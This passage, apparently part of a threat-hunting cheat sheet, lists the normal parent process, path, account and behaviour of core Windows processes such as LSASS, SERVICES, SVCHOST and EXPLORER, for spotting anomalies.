- runs from system32\csrss.exe

USERINIT.EXE
- parent is WINLOGON.EXE
- Runs logon scripts, connects to network, starts EXPLORER.EXE, then exits

EXPLORER.EXE
- no parent (because USERINIT.EXE launches it and then USERINIT.EXE exits)
- runs from \windows\explorer.exe
- no TCP/IP network connections
- normally launches most user processes as children

SERVICES.EXE
- parent is WININIT.EXE
- runs as NT AUTHORITY\SYSTEM
- runs from \system32\services.exe
- normally multiple children processes as SVCHOST.EXE for each service

LSASS.EXE
- parent is WININIT.EXE
- always only 1 LSASS.EXE
- should NEVER spawn child processes
- runs as NT AUTHORITY\SYSTEM
- runs from \system32\lsass.exe

LSM.EXE
- parent is WININIT.EXE
- should NEVER spawn child processes
- runs as NT AUTHORITY\SYSTEM
- runs from \system32\lsm.exe

SVCHOST.EXE
- parent is SERVICES.EXE
- runs from \system32\svchost.exe
- runas as 1 of these accounts (NT AUTHORITY\SYSTEM, LOCAL SERVICE, or NETWORK SERVICE)
- command line always looks like "SVCHOST.EXE -k [name]"